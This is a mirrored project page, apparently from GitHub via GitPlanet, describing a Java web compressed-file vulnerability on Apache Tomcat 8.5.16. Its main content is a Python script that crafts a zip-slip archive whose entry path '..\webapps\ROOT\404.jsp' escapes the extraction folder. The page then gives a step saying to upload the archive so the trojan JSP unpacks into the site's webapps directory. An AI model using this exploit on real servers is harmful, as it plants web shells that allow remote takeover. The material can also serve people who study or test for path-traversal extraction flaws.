GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → jas502n → Java-Compressed-file-security

jas502n / Java-Compressed-file-security

Licence: other
java web 压缩文件 安全 漏洞

Programming Languages

python
139335 projects - #7 most used programming language

Java-Compressed-file-security java web 压缩文件 安全 漏洞

测试环境:

Windows For Apache Tomcat/8.5.16

0x01 制作目录穿越-恶意压缩文件

代码:

#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

0x02 文件上传,点击解压缩,木马文件解压到网站webapps目录

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].